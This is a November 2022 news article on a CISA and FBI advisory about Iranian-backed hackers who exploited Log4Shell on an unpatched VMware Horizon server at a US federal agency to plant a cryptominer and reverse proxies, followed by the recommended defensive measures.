Posted on November 20, 2022 at 6:50 PM
Iranian Hackers Hit Domain Controller of US Federal Network Through Log4Shell Flaws
The CISA and the FBI, in a joint statement, revealed that an Iranian-backed hacking group infiltrated the Federal Civilian Executive Branch (FCEB) organization to plant XMRig cryptomining malware.
The threat actors had access to the federal network after hacking into an unpatched VMware Horizon server. They targeted the Log4shell remote code execution vulnerability termed CVE-2021-44228.
They Hackers Set Up Reverse Proxies On Exposed Servers
The statement noted that the Iran-backed threat actors set up reverse proxies on affected servers after planting the cryptocurrency miner. The proxies were arranged on affected servers to maintain persistence in the network.
The two U.S. agencies stated that organizations who are yet to patch their VMware systems against Log4Shell should assume that they have been compromised. They should start looking for malicious activities within their networks as soon as possible to prevent extended exposure and impact.
Earlier in June, CISA warned that Unified Access Gateway (UAG) and VMware servers were still being attacked by multiple threat actors. State-backed hacking syndicates using Log4Shell exploits were also part of the attackers.
Log4Shell is a zero-day vulnerability in a Java logging framework known as Log4j, which leads to arbitrary code execution. The vulnerability, when exploited, impacts VMware Horizon and a wide range of other products.
Log4shell can be exploited remotely to target vulnerable servers that have been exposed to internet access. Hackers can exploit the vulnerability to gain access to internal systems that store important data.
The Hackers Were Targeting Unpatched Systems
There was another disclosure in December last year where hackers were discovered taking advantage of the bug in Log4Shell. After the disclosure, several threat actors started scanning and exploiting the systems that were not yet patched. The list of threat actors includes state-backed hackers from North Korea, Iran, and China, as well as Turkey. It also includes access brokers who have close links to some ransomware groups.
Vulnerability disclosures are meant to alert system and server owners to patch their systems to avoid being exploited. But on several occasions, not all organizations were able to patch their systems and update them before the threat actors started feasting on vulnerable systems.
CISA has advised organizations who have not patched their systems to carry out a thorough check on their systems to wipe out any malware hiding within their network.
In January, after the vulnerability was patched, VMware urged customers to secure their VMware Horizon servers against attempts by threat actors who would want to take advantage of the vulnerability.
Apart from Iran-sponsored hackers, Chinese-speaking hackers have also been targeting the internet-exposed VMware Horizon servers. In some hacking incidences reported by researchers, the Chinese-speaking hackers deployed Night Sky ransomware and deployed backdoors. Also, the Iranian-aligned TunnelVision hacking group as well as the Lazarus North Korea APT deployed their attack arsenals.
Organizations Should Apply Defensive Measures
The FBI and CISA, in the recent advisory, strongly advised organizations to apply recommended defensive measures and mitigations to stay protected against the onslaught of the threat actors.
The advice includes:
Validating and testing their organizations’ security programs against the threat behaviors of the attackers, as contained in the MITRE ATT&CK for Enterprise framework in the CSA.
They should also update affected VMware Horizon and unified access gateway (UAG) systems in the latest version.
Additionally, organizations should try and reduce their internet-facing attack surface. They should avoid exposing their systems to the internet as much as possible to keep them away from threat actors.
The organizations should also endeavor to test their existing security network controls against the ATT&CK techniques described in the advisory. When organizations constantly test their network security against such types of attacks, they will be well-equipped to deal with any situation that comes from the threat actors.
Last year, CISA warned that the flaw in Log4Shell is capable of affecting hundreds of millions of devices. The recent development only proves that the threat actors are aware of the potential of exploits from systems that are still unpatched.
While several organizations acted swiftly to mitigate the vulnerability, threat actors also moved quickly to get into the systems of those who could not patch their systems.
There is also a possibility that the Iranian hackers launched an attack on the Merit Systems Protection Board. The advisory showed the need to take more serious actions against the threat posed by the vulnerability.